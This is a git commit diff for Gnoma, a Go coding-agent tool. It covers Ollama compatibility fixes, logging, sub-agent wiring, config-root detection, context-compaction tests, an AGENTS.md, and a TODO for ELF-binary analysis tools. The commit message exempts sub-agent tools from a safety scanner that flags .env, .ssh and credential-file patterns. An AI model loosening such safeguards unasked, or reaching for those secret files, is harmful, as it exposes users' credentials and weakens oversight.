feat: Ollama/gemma4 compat — /init flow, stream filter, safety fixes

provider/openai:
- Fix doubled tool call args (argsComplete flag): Ollama sends complete
  args in the first streaming chunk then repeats them as delta, causing
  doubled JSON and 400 errors in elfs
- Handle fs: prefix (gemma4 uses fs:grep instead of fs.grep)
- Add Reasoning field support for Ollama thinking output

cmd/gnoma:
- Early TTY detection so logger is created with correct destination
  before any component gets a reference to it (fixes slog WARN bleed
  into TUI textarea)

permission:
- Exempt spawn_elfs and agent tools from safety scanner: elf prompt
  text may legitimately mention .env/.ssh/credentials patterns and
  should not be blocked

tui/app:
- /init retry chain: no-tool-calls → spawn_elfs nudge → write nudge
  (ask for plain text output) → TUI fallback write from streamBuf
- looksLikeAgentsMD + extractMarkdownDoc: validate and clean fallback
  content before writing (reject refusals, strip narrative preambles)
- Collapse thinking output to 3 lines; ctrl+o to expand (live stream
  and committed messages)
- Stream-level filter for model pseudo-tool-call blocks: suppresses
  <<tool_code>>...</tool_code>> and <<function_call>>...<tool_call|>
  from entering streamBuf across chunk boundaries
- sanitizeAssistantText regex covers both block formats
- Reset streamFilterClose at every turn start
This commit is contained in:
2026-04-05 19:24:51 +02:00
parent 14b88cadcc
commit cb2d63d06f
51 changed files with 2855 additions and 353 deletions

4
.env.example Normal file
View File

@@ -0,0 +1,4 @@
MISTRAL_API_KEY="asd**"
ANTHROPICS_API_KEY="sk-ant-**"
OPENAI_API_KEY="sk-proj-**"
GEMINI_API_KEY="AIza**"

67
AGENTS.md Normal file
View File

@@ -0,0 +1,67 @@
# AGENTS.md
## 🚀 Project Overview: Gnoma Agentic Assistant
**Project Name:** Gnoma
**Description:** A provider-agnostic agentic coding assistant written in Go. The name is derived from the northern pygmy-owl (*Glaucidium gnoma*). This system facilitates complex, multi-step reasoning and task execution by orchestrating calls to various external Large Language Model (LLM) providers.
**Module Path:** `somegit.dev/Owlibou/gnoma`
---
## 🛠️ Build & Testing Instructions
The standard build system uses `make` for all development and testing tasks:
* **Build Binary:** `make build` (Creates the executable in `./bin/gnoma`)
* **Run All Tests:** `make test`
* **Lint Code:** `make lint` (Uses `golangci-lint`)
* **Run Coverage Report:** `make cover`
**Architectural Note:** Changes requiring deep architectural review or boundaries must first consult the design decisions documented in `docs/essentials/INDEX.md`.
---
## 🔗 Dependencies & Providers
The system is designed for provider agnosticism and supports multiple primary backends through standardized interfaces:
* **Mistral:** Via `github.com/VikingOwl91/mistral-go-sdk`
* **Anthropic:** Via `github.com/anthropics/anthropic-sdk-go`
* **OpenAI:** Via `github.com/openai/openai-go`
* **Google:** Via `google.golang.org/genai`
* **Ollama/llama.cpp:** Handled via the OpenAI SDK structure with a custom base URL configuration.
---
## 📜 Development Conventions (Mandatory Guidelines)
Adherence to the following conventions is required for maintainability, testability, and consistency across the entire codebase.
### ⭐ Go Idioms & Style
* **Modern Go:** Adhere strictly to Go 1.26 idioms, including the use of `new(expr)`, `errors.AsType[E]`, `sync.WaitGroup.Go`, and implementing structured logging via `log/slog`.
* **Data Structures:** Use **structs with explicit type discriminants** to model discriminated unions, *not* Go interfaces.
* **Streaming:** Implement pull-based stream iterators following the pattern: `Next() / Current() / Err() / Close()`.
* **API Handling:** Utilize `json.RawMessage` for tool schemas and arguments to ensure zero-cost JSON passthrough.
* **Configuration:** Favor **Functional Options** for complex configuration structures.
* **Concurrency:** Use `golang.org/x/sync/errgroup` for managing parallel work groups.
### 🧪 Testing Philosophy
* **TDD First:** Always write tests *before* writing production code.
* **Test Style:** Employ table-driven tests extensively.
* **Contextual Testing:**
* Use build tags (`//go:build integration`) for tests that interact with real external APIs.
* Use `testing/synctest` for any tests requiring concurrent execution checks.
* Use `t.TempDir()` for all file system simulations.
### 🏷️ Naming Conventions
* **Packages:** Names must be short, entirely lowercase, and contain no underscores.
* **Interfaces:** Must describe *behavior* (what it does), not *implementation* (how it is done).
* **Filenames/Types:** Should follow standard Go casing conventions.
### ⚙️ Execution & Pattern Guidelines
* **Orchestration Flow:** State management should be handled sequentially through specialized manager/worker structs (e.g., `AgentExecutor`).
* **Error Handling:** Favor structured, wrapped errors over bare `panic`/`recover`.
---
***Note:*** *This document synthesizes the core architectural constraints derived from the project structure.*

147
TODO.md Normal file
View File

@@ -0,0 +1,147 @@
# Gnoma ELF Support - TODO List
## Overview
This document outlines the steps to add **ELF (Executable and Linkable Format)** support to Gnoma, enabling features like ELF parsing, disassembly, security analysis, and binary manipulation.
---
## 📌 Goals
- Add ELF-specific tools to Gnomas toolset.
- Enable users to analyze, disassemble, and manipulate ELF binaries.
- Integrate with Gnomas existing permission and security systems.
---
## ✅ Implementation Steps
### 1. **Design ELF Tools**
- [ ] **`elf.parse`**: Parse and display ELF headers, sections, and segments.
- [ ] **`elf.disassemble`**: Disassemble code sections (e.g., `.text`) using `objdump` or a pure-Go disassembler.
- [ ] **`elf.analyze`**: Perform security analysis (e.g., check for packed binaries, missing security flags).
- [ ] **`elf.patch`**: Modify binary bytes or inject code (advanced feature).
- [ ] **`elf.symbols`**: Extract and list symbols from the symbol table.
### 2. **Implement ELF Tools**
- [ ] Create a new package: `internal/tool/elf`.
- [ ] Implement each tool as a struct with `Name()` and `Run(args map[string]interface{})` methods.
- [ ] Use `debug/elf` (standard library) or third-party libraries like `github.com/xyproto/elf` for parsing.
- [ ] Add support for external tools like `objdump` and `radare2` for disassembly.
#### Example: `elf.Parse` Tool
```go
package elf
import (
"debug/elf"
"fmt"
"os"
)
type ParseTool struct{}
func NewParseTool() *ParseTool {
return &ParseTool{}
}
func (t *ParseTool) Name() string {
return "elf.parse"
}
func (t *ParseTool) Run(args map[string]interface{}) (string, error) {
filePath, ok := args["file"].(string)
if !ok {
return "", fmt.Errorf("missing 'file' argument")
}
f, err := os.Open(filePath)
if err != nil {
return "", fmt.Errorf("failed to open file: %v", err)
}
defer f.Close()
ef, err := elf.NewFile(f)
if err != nil {
return "", fmt.Errorf("failed to parse ELF: %v", err)
}
defer ef.Close()
// Extract and format ELF headers
output := fmt.Sprintf("ELF Header:\n%s\n", ef.FileHeader)
output += fmt.Sprintf("Sections:\n")
for _, s := range ef.Sections {
output += fmt.Sprintf(" - %s (size: %d)\n", s.Name, s.Size)
}
output += fmt.Sprintf("Program Headers:\n")
for _, p := range ef.Progs {
output += fmt.Sprintf(" - Type: %s, Offset: %d, Vaddr: %x\n", p.Type, p.Off, p.Vaddr)
}
return output, nil
}
```
### 3. **Integrate ELF Tools with Gnoma**
- [ ] Update `buildToolRegistry()` in `cmd/gnoma/main.go` to register ELF tools:
```go
func buildToolRegistry() *tool.Registry {
reg := tool.NewRegistry()
reg.Register(bash.New())
reg.Register(fs.NewReadTool())
reg.Register(fs.NewWriteTool())
reg.Register(fs.NewEditTool())
reg.Register(fs.NewGlobTool())
reg.Register(fs.NewGrepTool())
reg.Register(fs.NewLSTool())
reg.Register(elf.NewParseTool()) // New ELF tool
reg.Register(elf.NewDisassembleTool()) // New ELF tool
reg.Register(elf.NewAnalyzeTool()) // New ELF tool
return reg
}
```
### 4. **Add Documentation**
- [ ] Add usage examples to `docs/elf-tools.md`.
- [ ] Update `CLAUDE.md` with ELF tool capabilities.
### 5. **Testing**
- [ ] Test ELF tools on sample binaries (e.g., `/bin/ls`, `/bin/bash`).
- [ ] Test edge cases (e.g., stripped binaries, packed binaries).
- [ ] Ensure integration with Gnomas permission and security systems.
### 6. **Security Considerations**
- [ ] Sandbox ELF tools to prevent malicious binaries from compromising the system.
- [ ] Validate file paths and arguments to avoid directory traversal or arbitrary file writes.
- [ ] Use Gnomas firewall to scan ELF tool outputs for suspicious patterns.
---
## 🛠️ Dependencies
- **Go Libraries**:
- [`debug/elf`](https://pkg.go.dev/debug/elf) (standard library).
- [`github.com/xyproto/elf`](https://github.com/xyproto/elf) (third-party).
- [`github.com/anchore/go-elf`](https://github.com/anchore/go-elf) (third-party).
- **External Tools**:
- `objdump` (for disassembly).
- `readelf` (for detailed ELF analysis).
- `radare2` (for advanced reverse engineering).
---
## 📝 Example Usage
### Interactive Mode
```
> Use the elf.parse tool to analyze /bin/ls
> elf.parse --file /bin/ls
```
### Pipe Mode
```bash
echo '{"file": "/bin/ls"}' | gnoma --tool elf.parse
```
---
## 🚀 Future Enhancements
- Add support for **PE (Portable Executable)** and **Mach-O** formats.
- Integrate with **Ghidra** or **IDA Pro** for advanced analysis.
- Add **automated exploit detection** for binaries.

View File

@@ -57,12 +57,33 @@ func main() {
os.Exit(0) os.Exit(0)
} }
// Logger // Logger — detect TUI mode early so logs don't bleed into the terminal UI.
// TUI = stdin is a character device (interactive TTY) with no positional args.
logLevel := slog.LevelWarn logLevel := slog.LevelWarn
if *verbose { if *verbose {
logLevel = slog.LevelDebug logLevel = slog.LevelDebug
} }
logger := slog.New(slog.NewTextHandler(os.Stderr, &slog.HandlerOptions{Level: logLevel})) isTUI := func() bool {
if len(flag.Args()) > 0 {
return false
}
stat, _ := os.Stdin.Stat()
return stat.Mode()&os.ModeCharDevice != 0
}()
var logOut io.Writer = os.Stderr
if isTUI {
if *verbose {
if f, err := os.CreateTemp("", "gnoma-*.log"); err == nil {
logOut = f
defer f.Close()
fmt.Fprintf(os.Stderr, "logging to %s\n", f.Name())
}
} else {
logOut = io.Discard
}
}
logger := slog.New(slog.NewTextHandler(logOut, &slog.HandlerOptions{Level: logLevel}))
slog.SetDefault(logger)
// Load config (defaults → global → project → env vars) // Load config (defaults → global → project → env vars)
cfg, err := gnomacfg.Load() cfg, err := gnomacfg.Load()
@@ -156,9 +177,10 @@ func main() {
armModel = prov.DefaultModel() armModel = prov.DefaultModel()
} }
armID := router.NewArmID(*providerName, armModel) armID := router.NewArmID(*providerName, armModel)
armProvider := limitedProvider(prov, *providerName, armModel, cfg)
arm := &router.Arm{ arm := &router.Arm{
ID: armID, ID: armID,
Provider: prov, Provider: armProvider,
ModelName: armModel, ModelName: armModel,
IsLocal: localProviders[*providerName], IsLocal: localProviders[*providerName],
Capabilities: provider.Capabilities{ToolUse: true}, // trust CLI provider Capabilities: provider.Capabilities{ToolUse: true}, // trust CLI provider
@@ -202,20 +224,6 @@ func main() {
providerFactory, 30*time.Second, providerFactory, 30*time.Second,
) )
// Create elf manager and register agent tool
elfMgr := elf.NewManager(elf.ManagerConfig{
Router: rtr,
Tools: reg,
Logger: logger,
})
elfProgressCh := make(chan elf.Progress, 16)
agentTool := agent.New(elfMgr)
agentTool.SetProgressCh(elfProgressCh)
reg.Register(agentTool)
batchTool := agent.NewBatch(elfMgr)
batchTool.SetProgressCh(elfProgressCh)
reg.Register(batchTool)
// Create firewall // Create firewall
entropyThreshold := 4.5 entropyThreshold := 4.5
if cfg.Security.EntropyThreshold > 0 { if cfg.Security.EntropyThreshold > 0 {
@@ -265,15 +273,38 @@ func main() {
} }
permChecker := permission.NewChecker(permission.Mode(*permMode), permRules, pipePromptFn) permChecker := permission.NewChecker(permission.Mode(*permMode), permRules, pipePromptFn)
// Build system prompt with compact inventory summary // Create elf manager and register agent tools.
// Must be created after fw and permChecker so elfs inherit security layers.
elfMgr := elf.NewManager(elf.ManagerConfig{
Router: rtr,
Tools: reg,
Permissions: permChecker,
Firewall: fw,
Logger: logger,
})
elfProgressCh := make(chan elf.Progress, 16)
agentTool := agent.New(elfMgr)
agentTool.SetProgressCh(elfProgressCh)
reg.Register(agentTool)
batchTool := agent.NewBatch(elfMgr)
batchTool.SetProgressCh(elfProgressCh)
reg.Register(batchTool)
// Build system prompt with cwd + compact inventory summary
systemPrompt := *system systemPrompt := *system
if cwd, err := os.Getwd(); err == nil {
systemPrompt = systemPrompt + "\n\nWorking directory: " + cwd
}
if summary := inventory.Summary(); summary != "" { if summary := inventory.Summary(); summary != "" {
systemPrompt = systemPrompt + "\n\n" + summary systemPrompt = systemPrompt + "\n\n" + summary
} }
if aliasSummary := aliases.AliasSummary(); aliasSummary != "" {
systemPrompt = systemPrompt + "\n" + aliasSummary
}
// Load project docs as immutable context prefix // Load project docs as immutable context prefix
var prefixMsgs []message.Message var prefixMsgs []message.Message
for _, name := range []string{"CLAUDE.md", ".gnoma/GNOMA.md"} { for _, name := range []string{"AGENTS.md", "CLAUDE.md", ".gnoma/GNOMA.md"} {
data, err := os.ReadFile(name) data, err := os.ReadFile(name)
if err != nil { if err != nil {
continue continue
@@ -378,6 +409,7 @@ func main() {
Engine: eng, Engine: eng,
Permissions: permChecker, Permissions: permChecker,
Router: rtr, Router: rtr,
ElfManager: elfMgr,
PermCh: permCh, PermCh: permCh,
PermReqCh: permReqCh, PermReqCh: permReqCh,
ElfProgress: elfProgressCh, ElfProgress: elfProgressCh,
@@ -528,7 +560,31 @@ func resolveRateLimitPools(armID router.ArmID, provName, modelName string, cfg *
return router.PoolsFromRateLimits(armID, rl) return router.PoolsFromRateLimits(armID, rl)
} }
// limitedProvider wraps p with a concurrency semaphore derived from rate limits.
// All engines (main and elf) sharing the same arm share the same semaphore.
func limitedProvider(p provider.Provider, provName, modelName string, cfg *gnomacfg.Config) provider.Provider {
defaults := provider.DefaultRateLimits(provName)
rl, _ := defaults.LookupModel(modelName)
if cfg.RateLimits != nil {
if override, ok := cfg.RateLimits[provName]; ok {
if override.RPS > 0 {
rl.RPS = override.RPS
}
if override.RPM > 0 {
rl.RPM = override.RPM
}
}
}
return provider.WithConcurrency(p, rl.MaxConcurrent())
}
const defaultSystem = `You are gnoma, a provider-agnostic agentic coding assistant. const defaultSystem = `You are gnoma, a provider-agnostic agentic coding assistant.
You help users with software engineering tasks by reading files, writing code, and executing commands. You help users with software engineering tasks by reading files, writing code, and executing commands.
Be concise and direct. Use tools when needed to accomplish the task. Be concise and direct. Use tools when needed to accomplish the task.
When spawning multiple elfs (sub-agents), call ALL agent tools in a single response so they run in parallel. Do NOT spawn one elf, wait for its result, then spawn the next.`
When a task involves 2 or more independent sub-tasks, use the spawn_elfs tool to run them in parallel. Examples:
- "fix the tests and update the docs" → spawn 2 elfs (one for tests, one for docs)
- "analyze files A, B, and C" → spawn 3 elfs (one per file)
- "refactor this function" → single sequential workflow (one dependent task)
When using spawn_elfs, list all tasks in one call — do NOT spawn one elf at a time.`

2
go.mod
View File

@@ -10,6 +10,7 @@ require (
github.com/BurntSushi/toml v1.6.0 github.com/BurntSushi/toml v1.6.0
github.com/VikingOwl91/mistral-go-sdk v1.3.0 github.com/VikingOwl91/mistral-go-sdk v1.3.0
github.com/anthropics/anthropic-sdk-go v1.29.0 github.com/anthropics/anthropic-sdk-go v1.29.0
github.com/charmbracelet/x/ansi v0.11.6
github.com/openai/openai-go v1.12.0 github.com/openai/openai-go v1.12.0
golang.org/x/text v0.35.0 golang.org/x/text v0.35.0
google.golang.org/genai v1.52.1 google.golang.org/genai v1.52.1
@@ -26,7 +27,6 @@ require (
github.com/cespare/xxhash/v2 v2.3.0 // indirect github.com/cespare/xxhash/v2 v2.3.0 // indirect
github.com/charmbracelet/colorprofile v0.4.2 // indirect github.com/charmbracelet/colorprofile v0.4.2 // indirect
github.com/charmbracelet/ultraviolet v0.0.0-20260205113103-524a6607adb8 // indirect github.com/charmbracelet/ultraviolet v0.0.0-20260205113103-524a6607adb8 // indirect
github.com/charmbracelet/x/ansi v0.11.6 // indirect
github.com/charmbracelet/x/exp/slice v0.0.0-20250327172914-2fdc97757edf // indirect github.com/charmbracelet/x/exp/slice v0.0.0-20250327172914-2fdc97757edf // indirect
github.com/charmbracelet/x/term v0.2.2 // indirect github.com/charmbracelet/x/term v0.2.2 // indirect
github.com/charmbracelet/x/termios v0.1.1 // indirect github.com/charmbracelet/x/termios v0.1.1 // indirect

View File

@@ -48,14 +48,14 @@ type ProviderSection struct {
Default string `toml:"default"` Default string `toml:"default"`
Model string `toml:"model"` Model string `toml:"model"`
MaxTokens int64 `toml:"max_tokens"` MaxTokens int64 `toml:"max_tokens"`
Temperature *float64 `toml:"temperature"` Temperature *float64 `toml:"temperature"` // TODO(M8): wire to provider.Request.Temperature
APIKeys map[string]string `toml:"api_keys"` APIKeys map[string]string `toml:"api_keys"`
Endpoints map[string]string `toml:"endpoints"` Endpoints map[string]string `toml:"endpoints"`
} }
type ToolsSection struct { type ToolsSection struct {
BashTimeout Duration `toml:"bash_timeout"` BashTimeout Duration `toml:"bash_timeout"`
MaxFileSize int64 `toml:"max_file_size"` MaxFileSize int64 `toml:"max_file_size"` // TODO(M8): wire to fs tool WithMaxFileSize option
} }
// RateLimitSection allows overriding default rate limits per provider. // RateLimitSection allows overriding default rate limits per provider.

View File

@@ -119,6 +119,67 @@ func TestApplyEnv_EnvVarReference(t *testing.T) {
} }
} }
func TestProjectRoot_GoMod(t *testing.T) {
root := t.TempDir()
sub := filepath.Join(root, "pkg", "util")
os.MkdirAll(sub, 0o755)
os.WriteFile(filepath.Join(root, "go.mod"), []byte("module example.com/foo\n"), 0o644)
origDir, _ := os.Getwd()
os.Chdir(sub)
defer os.Chdir(origDir)
got := ProjectRoot()
if got != root {
t.Errorf("ProjectRoot() = %q, want %q", got, root)
}
}
func TestProjectRoot_Git(t *testing.T) {
root := t.TempDir()
sub := filepath.Join(root, "src")
os.MkdirAll(sub, 0o755)
os.MkdirAll(filepath.Join(root, ".git"), 0o755)
origDir, _ := os.Getwd()
os.Chdir(sub)
defer os.Chdir(origDir)
got := ProjectRoot()
if got != root {
t.Errorf("ProjectRoot() = %q, want %q", got, root)
}
}
func TestProjectRoot_GnomaDir(t *testing.T) {
root := t.TempDir()
sub := filepath.Join(root, "internal")
os.MkdirAll(sub, 0o755)
os.MkdirAll(filepath.Join(root, ".gnoma"), 0o755)
origDir, _ := os.Getwd()
os.Chdir(sub)
defer os.Chdir(origDir)
got := ProjectRoot()
if got != root {
t.Errorf("ProjectRoot() = %q, want %q", got, root)
}
}
func TestProjectRoot_Fallback(t *testing.T) {
dir := t.TempDir()
origDir, _ := os.Getwd()
os.Chdir(dir)
defer os.Chdir(origDir)
got := ProjectRoot()
if got != dir {
t.Errorf("ProjectRoot() = %q, want %q (cwd fallback)", got, dir)
}
}
func TestLayeredLoad(t *testing.T) { func TestLayeredLoad(t *testing.T) {
// Set up global config // Set up global config
globalDir := t.TempDir() globalDir := t.TempDir()

View File

@@ -55,8 +55,31 @@ func globalConfigPath() string {
return filepath.Join(configDir, "gnoma", "config.toml") return filepath.Join(configDir, "gnoma", "config.toml")
} }
// ProjectRoot walks up from cwd to find the nearest directory containing
// a go.mod, .git, or .gnoma directory. Falls back to cwd if none found.
func ProjectRoot() string {
cwd, err := os.Getwd()
if err != nil {
return "."
}
dir := cwd
for {
for _, marker := range []string{"go.mod", ".git", ".gnoma"} {
if _, err := os.Stat(filepath.Join(dir, marker)); err == nil {
return dir
}
}
parent := filepath.Dir(dir)
if parent == dir {
break
}
dir = parent
}
return cwd
}
func projectConfigPath() string { func projectConfigPath() string {
return filepath.Join(".gnoma", "config.toml") return filepath.Join(ProjectRoot(), ".gnoma", "config.toml")
} }
func applyEnv(cfg *Config) { func applyEnv(cfg *Config) {

View File

@@ -9,6 +9,7 @@ import (
"github.com/BurntSushi/toml" "github.com/BurntSushi/toml"
) )
// SetProjectConfig writes a single key=value to the project config file (.gnoma/config.toml). // SetProjectConfig writes a single key=value to the project config file (.gnoma/config.toml).
// Only whitelisted keys are supported. // Only whitelisted keys are supported.
func SetProjectConfig(key, value string) error { func SetProjectConfig(key, value string) error {
@@ -21,7 +22,7 @@ func SetProjectConfig(key, value string) error {
return fmt.Errorf("unknown config key %q (supported: %s)", key, strings.Join(allowedKeys(), ", ")) return fmt.Errorf("unknown config key %q (supported: %s)", key, strings.Join(allowedKeys(), ", "))
} }
path := filepath.Join(".gnoma", "config.toml") path := projectConfigPath()
// Load existing config or start fresh // Load existing config or start fresh
var cfg Config var cfg Config

View File

@@ -0,0 +1,34 @@
package context
import "somegit.dev/Owlibou/gnoma/internal/message"
// safeSplitPoint adjusts a compaction split index to avoid orphaning tool
// results. If history[target] is a tool-result message, it walks backward
// until it finds a message that is not a tool result, so the assistant message
// that issued the tool calls stays in the "recent" window alongside its results.
//
// target is the index of the first message to keep in the recent window.
// Returns an adjusted index guaranteed to keep tool-call/tool-result pairs together.
func safeSplitPoint(history []message.Message, target int) int {
if target <= 0 || len(history) == 0 {
return 0
}
if target >= len(history) {
target = len(history) - 1
}
idx := target
for idx > 0 && hasToolResults(history[idx]) {
idx--
}
return idx
}
// hasToolResults reports whether msg contains any ContentToolResult blocks.
func hasToolResults(msg message.Message) bool {
for _, c := range msg.Content {
if c.Type == message.ContentToolResult {
return true
}
}
return false
}

View File

@@ -197,3 +197,215 @@ func (s *failingStrategy) Compact(msgs []message.Message, budget int64) ([]messa
} }
var _ Strategy = (*failingStrategy)(nil) var _ Strategy = (*failingStrategy)(nil)
func TestWindow_AppendMessage_NoTokenTracking(t *testing.T) {
w := NewWindow(WindowConfig{MaxTokens: 100_000})
before := w.Tracker().Used()
w.AppendMessage(message.NewUserText("hello"))
after := w.Tracker().Used()
if after != before {
t.Errorf("AppendMessage should not change tracker: before=%d, after=%d", before, after)
}
if len(w.Messages()) != 1 {
t.Errorf("expected 1 message, got %d", len(w.Messages()))
}
}
func TestWindow_CompactionUsesEstimateNotRatio(t *testing.T) {
// Add many small messages then compact to 2.
// The token estimate post-compaction should reflect actual content,
// not a message-count ratio of the previous token count.
w := NewWindow(WindowConfig{
MaxTokens: 200_000,
Strategy: &TruncateStrategy{KeepRecent: 2},
})
// Push 20 messages, each costing 8000 tokens (total: 160K).
// Compaction should leave 2 messages.
for i := 0; i < 10; i++ {
w.Append(message.NewUserText("msg"), message.Usage{InputTokens: 4000})
w.Append(message.NewAssistantText("reply"), message.Usage{OutputTokens: 4000})
}
// Push past critical
w.Tracker().Set(200_000 - DefaultAutocompactBuffer)
compacted, err := w.CompactIfNeeded()
if err != nil {
t.Fatalf("CompactIfNeeded: %v", err)
}
if !compacted {
t.Skip("compaction did not trigger")
}
// After compaction to ~2 messages, EstimateMessages(2 short messages) ~ <100 tokens.
// The old ratio approach would give ~(2/21) * ~(200K-13K) = ~17800 tokens.
// Verify we're well below 17000, indicating the estimate-based approach.
if w.Tracker().Used() >= 17_000 {
t.Errorf("token tracker after compaction seems to use ratio (got %d tokens, expected <17000 for estimate-based)", w.Tracker().Used())
}
}
func TestWindow_AddPrefix_AppendsToPrefix(t *testing.T) {
w := NewWindow(WindowConfig{
MaxTokens: 100_000,
PrefixMessages: []message.Message{message.NewSystemText("initial prefix")},
})
w.AppendMessage(message.NewUserText("hello"))
w.AddPrefix(
message.NewUserText("[Project docs: AGENTS.md]\n\nBuild: make build"),
message.NewAssistantText("Understood."),
)
all := w.AllMessages()
// prefix (1 initial + 2 added) + messages (1)
if len(all) != 4 {
t.Errorf("AllMessages() = %d, want 4", len(all))
}
// The added prefix messages come after the initial prefix, before conversation
if all[1].Role != "user" {
t.Errorf("all[1].Role = %q, want user", all[1].Role)
}
if all[3].Role != "user" {
t.Errorf("all[3].Role = %q, want user (conversation msg)", all[3].Role)
}
}
func TestWindow_AddPrefix_SurvivesReset(t *testing.T) {
w := NewWindow(WindowConfig{MaxTokens: 100_000})
w.AppendMessage(message.NewUserText("hello"))
w.AddPrefix(message.NewSystemText("added prefix"))
w.Reset()
all := w.AllMessages()
// Prefix should survive Reset(), conversation messages cleared
if len(all) != 1 {
t.Errorf("AllMessages() after Reset = %d, want 1 (just added prefix)", len(all))
}
}
func TestWindow_Reset_ClearsMessages(t *testing.T) {
w := NewWindow(WindowConfig{
MaxTokens: 100_000,
PrefixMessages: []message.Message{message.NewSystemText("prefix")},
})
w.AppendMessage(message.NewUserText("hello"))
w.Tracker().Set(5000)
w.Reset()
if len(w.Messages()) != 0 {
t.Errorf("Messages after reset = %d, want 0", len(w.Messages()))
}
if w.Tracker().Used() != 0 {
t.Errorf("Tracker after reset = %d, want 0", w.Tracker().Used())
}
// Prefix should be preserved
if len(w.AllMessages()) != 1 {
t.Errorf("AllMessages after reset should have prefix only, got %d", len(w.AllMessages()))
}
}
// --- Compaction safety (safeSplitPoint) ---
func toolCallMsg() message.Message {
return message.NewAssistantContent(
message.NewToolCallContent(message.ToolCall{
ID: "call-123",
Name: "bash",
}),
)
}
func toolResultMsg() message.Message {
return message.NewToolResults(message.ToolResult{
ToolCallID: "call-123",
Content: "result",
})
}
func TestSafeSplitPoint_NoAdjustmentNeeded(t *testing.T) {
history := []message.Message{
message.NewUserText("hello"), // 0
message.NewAssistantText("hi"), // 1
message.NewUserText("do something"), // 2 — plain user text, safe split point
}
// Target split at index 2: keep history[2:] as recent. Not a tool result.
got := safeSplitPoint(history, 2)
if got != 2 {
t.Errorf("safeSplitPoint = %d, want 2 (no adjustment needed)", got)
}
}
func TestSafeSplitPoint_WalksBackPastToolResult(t *testing.T) {
history := []message.Message{
message.NewUserText("hello"), // 0
message.NewAssistantText("hi"), // 1
toolCallMsg(), // 2 — assistant with tool call
toolResultMsg(), // 3 — tool result (should NOT be split point)
message.NewAssistantText("done"), // 4
}
// Target split at 3 would orphan the tool result (no matching tool call in recent window)
got := safeSplitPoint(history, 3)
if got != 2 {
t.Errorf("safeSplitPoint = %d, want 2 (walk back past tool result to tool call)", got)
}
}
func TestSafeSplitPoint_NeverGoesNegative(t *testing.T) {
// All messages are tool results — should return 0 (not go below 0)
history := []message.Message{
toolResultMsg(),
toolResultMsg(),
}
got := safeSplitPoint(history, 0)
if got != 0 {
t.Errorf("safeSplitPoint = %d, want 0 (floor at 0)", got)
}
}
func TestTruncate_NeverOrphansToolResult(t *testing.T) {
s := NewTruncateStrategy() // keepRecent = 10
s.KeepRecent = 3
// History: user, assistant+toolcall, user+toolresult, assistant, user
// With keepRecent=3, naive split at index 2 would grab [toolresult, assistant, user]
// — orphaning the tool call. safeSplitPoint should walk back to index 1 instead.
history := []message.Message{
message.NewUserText("start"), // 0
toolCallMsg(), // 1 — assistant with tool call
toolResultMsg(), // 2 — must stay paired with index 1
message.NewAssistantText("done"), // 3
message.NewUserText("next"), // 4
}
result, err := s.Compact(history, 100_000)
if err != nil {
t.Fatalf("Compact error: %v", err)
}
// Find the tool result message in result and verify its tool call ID
// appears somewhere in a preceding assistant message
toolCallIDs := make(map[string]bool)
for _, m := range result {
for _, c := range m.Content {
if c.Type == message.ContentToolCall && c.ToolCall != nil {
toolCallIDs[c.ToolCall.ID] = true
}
}
}
for _, m := range result {
for _, c := range m.Content {
if c.Type == message.ContentToolResult && c.ToolResult != nil {
if !toolCallIDs[c.ToolResult.ToolCallID] {
t.Errorf("orphaned tool result: ToolCallID %q has no matching tool call in compacted history",
c.ToolResult.ToolCallID)
}
}
}
}
}

View File

@@ -56,13 +56,16 @@ func (s *SummarizeStrategy) Compact(messages []message.Message, budget int64) ([
return messages, nil return messages, nil
} }
// Split: old messages to summarize, recent to keep // Split: old messages to summarize, recent to keep.
// Adjust split to never orphan tool results — the assistant message with
// matching tool calls must stay in the recent window with its results.
keepRecent := 6 keepRecent := 6
if keepRecent > len(history) { if keepRecent > len(history) {
keepRecent = len(history) keepRecent = len(history)
} }
oldMessages := history[:len(history)-keepRecent] splitAt := safeSplitPoint(history, len(history)-keepRecent)
recentMessages := history[len(history)-keepRecent:] oldMessages := history[:splitAt]
recentMessages := history[splitAt:]
// Build conversation text for summarization // Build conversation text for summarization
var convText strings.Builder var convText strings.Builder

View File

@@ -46,7 +46,10 @@ func (s *TruncateStrategy) Compact(messages []message.Message, budget int64) ([]
marker := message.NewUserText("[Earlier conversation was summarized to save context]") marker := message.NewUserText("[Earlier conversation was summarized to save context]")
ack := message.NewAssistantText("Understood, I'll continue from here.") ack := message.NewAssistantText("Understood, I'll continue from here.")
recent := history[len(history)-keepRecent:] // Adjust split to never orphan tool results (the assistant message with
// matching tool calls must stay in the recent window with its results).
splitAt := safeSplitPoint(history, len(history)-keepRecent)
recent := history[splitAt:]
result := append(systemMsgs, marker, ack) result := append(systemMsgs, marker, ack)
result = append(result, recent...) result = append(result, recent...)
return result, nil return result, nil

View File

@@ -57,12 +57,20 @@ func NewWindow(cfg WindowConfig) *Window {
} }
} }
// Append adds a message and tracks usage. // Append adds a message and tracks usage (legacy: accumulates InputTokens+OutputTokens).
// Prefer AppendMessage + Tracker().Set() for accurate per-round tracking.
func (w *Window) Append(msg message.Message, usage message.Usage) { func (w *Window) Append(msg message.Message, usage message.Usage) {
w.messages = append(w.messages, msg) w.messages = append(w.messages, msg)
w.tracker.Add(usage) w.tracker.Add(usage)
} }
// AppendMessage adds a message without touching the token tracker.
// Use this for user messages, tool results, and injected context — callers
// are responsible for updating the tracker separately (e.g., via Tracker().Set).
func (w *Window) AppendMessage(msg message.Message) {
w.messages = append(w.messages, msg)
}
// Messages returns the mutable conversation history (without prefix). // Messages returns the mutable conversation history (without prefix).
func (w *Window) Messages() []message.Message { func (w *Window) Messages() []message.Message {
return w.messages return w.messages
@@ -162,8 +170,9 @@ func (w *Window) doCompact(force bool) (bool, error) {
originalLen := len(w.messages) originalLen := len(w.messages)
w.messages = compacted w.messages = compacted
ratio := float64(len(compacted)) / float64(originalLen+1) // Re-estimate tokens from actual message content rather than using a
w.tracker.Set(int64(float64(w.tracker.Used()) * ratio)) // message-count ratio (which is unrelated to token count).
w.tracker.Set(EstimateMessages(compacted))
w.logger.Info("compaction complete", w.logger.Info("compaction complete",
"messages_before", originalLen, "messages_before", originalLen,
@@ -179,6 +188,12 @@ func (w *Window) doCompact(force bool) (bool, error) {
return true, nil return true, nil
} }
// AddPrefix appends messages to the immutable prefix.
// Used to hot-load project docs (e.g., after /init generates AGENTS.md).
func (w *Window) AddPrefix(msgs ...message.Message) {
w.prefix = append(w.prefix, msgs...)
}
// Reset clears all messages and usage (prefix is preserved). // Reset clears all messages and usage (prefix is preserved).
func (w *Window) Reset() { func (w *Window) Reset() {
w.messages = nil w.messages = nil

View File

